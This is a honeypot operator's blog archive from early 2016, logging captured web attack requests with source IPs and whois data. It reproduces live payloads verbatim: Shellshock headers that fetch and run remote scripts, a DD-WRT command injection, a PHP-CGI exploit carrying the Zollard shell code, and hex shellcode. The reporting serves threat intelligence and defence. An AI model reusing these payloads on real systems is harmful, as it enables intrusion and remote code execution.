Good morning,
as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots have had some issues.
The vservers will be going down soon. So no more analytics.
Thanks to Swen for having the Germany running for so long. I am currently looking for cheap vservers in the world and talks to some people about funding the operation costs, until than....
This is the end
Freitag, 4. März 2016
Donnerstag, 11. Februar 2016
159.226.162.196 - #perl wget via 204.232.209.188
BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'
Host: 109.234.106.8
Connection: Close
END OF DATA
The http server returned 404 at the time of the investigation
Copyright (c) 2015,2016, Joerg Stephan
Disclaimer:This information is provided as-is and there is no guarantee |
159.226.162[.]196
204.232.209[.]188
|
Sonntag, 7. Februar 2016
178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081
BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080
END OF DATA
The ug.sh tries to download an binary file
Just by taking a look of the xxd and strings output of the file, it looks like an DD-WRT firmware file.
Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.
Disclaimer:This information is provided as-is and there is no guaranteethat blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.
178.57.115[.]231
- Whois Data (TeamCymru)
- AS : 60139
- IP : 178.57.115.231
- BGP Prefix : 178.57.112.0/21
- CC : RU
- Registry : ripencc
- Allocated : 2010-02-02
- AS Name: Z-TELECOM Z-Telecom Ltd,RU
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
178.57.115[.]231
- Whois Data (TeamCymru)
- AS : 60139
- IP : 178.57.115.231
- BGP Prefix : 178.57.112.0/21
- CC : RU
- Registry : ripencc
- Allocated : 2010-02-02
- AS Name: Z-TELECOM Z-Telecom Ltd,RU
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Sonntag, 24. Januar 2016
61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)
BEGIN OF HTTP DATA:For more information https://user-agents.me/crawler/whatweb048-dev
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*
According to some news in the web, this crawler is meant to identify the running webpages on a server.
61.49.45[.]47
- Whois Data (TeamCymru)
- AS : 4808
- IP : 61.49.45.47
- BGP Prefix : 61.49.0.0/18
- CC : CN
- Registry : apnic
- Allocated : 2001-06-28
- AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/61.49.45.47
Donnerstag, 21. Januar 2016
213.136.72.84 . Shellshock perl via 204.232.209.188
BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'
Host: 195.169.125.87
Connection: Close
END OF DATA
213.136.72[.]84
204.232.209[.]188
|
92.45.197.218 - Zollard php execution
BEGIN OF HTTP DATA:Sadly the request was to long to be fully logged by the fake HTTP server
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F
%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%6
9%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%
66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63
%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close
<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
global $disablefunc;
$result = "";
if (!empty($cmd))
{
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disabl
END OF DATA
The POST messages is
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1
92.45.197[.]218
- Whois Data (TeamCymru)
- AS : 34984
- IP : 92.45.197.218
- BGP Prefix : 92.45.196.0/23
- CC : TR
- Registry : ripencc
- Allocated : 2007-12-17
- AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Mittwoch, 13. Januar 2016
Scanner seen on January 14, 2016
- 185.130.5.207 - muieblackcat
- 37.142.32.222 - masscan/1.0
- 149.78.19.136 - masscan/1.0
- 195.169.125.87 - zgrab/0.x
- 185.130.5.235 - muieblackcat
185.130.5[.]207
37.142.32[.]222
149.78.19[.]136
195.169.125[.]87
185.130.5[.]235
|
83.54.165.57 - Shellshock wget via http://192.192.78.216:9090
BEGIN OF HTTP DATA:
2016-01-13 08:48:44
Source IP: 83.54.165.57
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh 0<&1 2>&1
83.54.165[.]57
192.192.78[.]216
|
Dienstag, 12. Januar 2016
Scanner seen on January 11,12 2016
- 208.100.26.231 - Nmap Scripting Engine
- 141.212.122.81 - zgrab/0.x
- 141.212.122.145 - zgrab/0.x
208.100.26[.]231
141.212.122[.]81
141.212.122[.]145
|
Samstag, 9. Januar 2016
85.73.42.84 - wget via http://lliillii.altervista.org/io.php
BEGIN OF HTTP DATA:
2016-01-08 10:07:22
Source IP: 85.73.42.84
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1
85.73.42[.]84
- Whois Data (TeamCymru)
- AS : 6799
- IP : 85.73.42.84
- BGP Prefix : 85.73.0.0/16
- CC : GR
- Registry : ripencc
- Allocated : 2006-05-17
- AS Name: OTENET-GR Ote SA (Hellenic Telecommunications Organisation),GR
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Scanner seen on January 9, 2016
- 93.174.93.203 - masscan/1.0
- 141.212.122.145 - zgrab/0.x
- 69.30.217.226 - muieblackcat
93.174.93[.]203
141.212.122[.]145
69.30.217[.]226
|
Donnerstag, 7. Januar 2016
84.246.228.80 - access cnf/db.php
BEGIN OF HTTP DATA:
2016-01-07 21:11:32
Source IP: 84.246.228.80
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.3
Host: 109.234.106.8
Accept-Encoding: gzip, deflate
84.246.228[.]80
- Whois Data (TeamCymru)
- AS : 34274
- IP : 84.246.228.80
- BGP Prefix : 84.246.224.0/21
- CC : FR
- Registry : ripencc
- Allocated : 2004-10-25
- AS Name: ELBMULTIMEDIA ELB MULTIMEDIA,FR
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Scanner seen on January 8, 2016
- 185.130.5.207 - muieblackcat
- 141.212.122.64 - zgrab/0.x
- 5.28.172.193 - masscan/1.0
185.130.5[.]207
141.212.122[.]64
5.28.172[.]193
|
Mittwoch, 6. Januar 2016
Scanner seen on January, 7 2016
- 149.78.19.136 - masscan/1.0
- 213.57.67.192 - masscan/1.0
- 94.102.48.195 - masscan/1.0
- 195.169.125.87 - zgrab/0.x
- 85.25.217.27 - muieblackcat
149.78.19[.]136
213.57.67[.]192
94.102.48[.]195
195.169.125[.]87
85.25.217[.]27
|
Dienstag, 5. Januar 2016
46.172.71.251, 195.169.125.87 - to ping 212.47.238.143
BEGIN OF HTTP DATA:
2016-01-05 21:01:11
Source IP: 46.172.71.251 (2nd: 195.169.125.87)
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close
END OF DATA
212.47.238[.]143
46.172.71[.]251
195.169.125[.]87
|
Montag, 4. Januar 2016
Scanner seen on January 05, 2016
- 118.98.104[.]21 - Morfeus Fucking Scanner
- 89.248.168[.]139 - masscan/1.0
- 5.28.182[.]161 - masscan/1.0
- 93.174.93[.]203 - masscan/1.0
118.98.104[.]21
89.248.168[.]139
5.28.182[.]161
93.174.93[.]203
|
118.98.104.21 - Morfeus Fucking Scanner
118.98.104[.]21
- Whois Data (TeamCymru)
- AS : 17974
- IP : 118.98.104.21
- BGP Prefix : 118.98.104.0/24
- CC : ID
- Registry : apnic
- Allocated : 2007-08-24
- AS Name: TELKOMNET-AS2-AP PT Telekomunikasi Indonesia,ID
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/118.98.104.21
- Static Source: http://sendmespamids.blogspot.nl/ Blacklist
- Comment: Listed on Honeypot blacklist
- Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
77.126.12.73 - masscan/1.0
77.126.12[.]73
- Whois Data (TeamCymru)
- AS : 9116
- IP : 77.126.12.73
- BGP Prefix : 77.126.0.0/20
- CC : IL
- Registry : ripencc
- Allocated : 2006-11-07
- AS Name: GOLDENLINES-ASN 012 Smile Communications Ltd.,IL
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: IBM X-Force Exchange
- Score: 5.7
- Reference: https://exchange.xforce.ibmcloud.com/ip/77.126.12.73
- Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/77.126.12.73
Freitag, 1. Januar 2016
185.130.5.224 - apache 0day by @hxmonsegur [Update1 - 05/01/2016]
BEGIN OF HTTP DATA:
2016-01-01 05:47:15
185.130.5.224
GET /server-status?HTTP_POST=%"%6346#%#/ˠ%"#423|;&HTTP_CGI_GET=GRESYYK"K&J"#L523D2G23H23 HTTP/1.0
User-Agent: apache 0day by @hxmonsegur
Accept: */*
31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c95 1516848e51cb966680539b102665189e7b31053575289e1b303b066cd8031
c939c1740631c0b001cd8031c0b03f89d3cd8031c0b03f89d3b101cd8031c0
b03f89d3b102cd8031c031d250686e2f7368682f2f626989e3505389e1b00bcd
8031c0b001cd80
END OF DATA
185.130.5[.]224
- Whois Data (TeamCymru)
- AS : 203569
- IP : 185.130.5.224
- BGP Prefix : 185.130.5.0/24
- CC : LThttps://www.blogger.com/blogger.g?blogID=7778406999173736079#editor/target=post;postID=5908088170526748213
- Registry : ripencc
- Allocated : 2015-12-04
- AS Name: SILK-AS Sindicate Group Ltd,LT
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: IBM X-Force Exchange
- Score: 1.4
- Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.224
- Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/185.130.5.224
UPDATE:
The vulnerability (if it exists and is not just a marketing idea to push twitter follower) is not reflected by any entry in exploit-db.com or 0day.today
UPDATE 2: (Thanks to@DanielRufde)
https://www.reddit.com/r/security/comments/3z4yiw/user_agent_apache_0day_by_hxmonsegur_new_hacking/cyjxuu0
Abonnieren
Posts (Atom)